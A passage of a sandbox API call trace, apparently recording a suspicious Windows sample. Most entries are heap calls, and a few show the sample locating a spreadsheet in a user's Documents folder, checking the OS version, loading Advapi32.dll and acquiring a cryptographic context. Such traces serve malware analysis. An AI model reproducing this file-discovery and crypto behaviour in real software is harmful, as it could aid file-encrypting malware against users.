hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0215.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0215.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0215.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/iN034yd-ltTggQ-HcC.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf7bf00, ftCreationTime.dwHighDateTime=0x1d5b5f4, ftLastAccessTime.dwLowDateTime=0x393cd1c0, ftLastAccessTime.dwHighDateTime=0x1d59f68, ftLastWriteTime.dwLowDateTime=0x393cd1c0, ftLastWriteTime.dwHighDateTime=0x1d59f68, nFileSizeHigh=0x0, nFileSizeLow=0x8ed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="iN034yd-ltTggQ-HcC.xlsx", cAlternateFileName="IN034Y~1.XLS")) returned 0x9e2138 [0215.832] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0215.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0215.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.835] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.835] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0215.835] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.835] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0215.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.836] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.837] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.837] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0215.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.838] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.838] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.838] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.839] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c330) returned 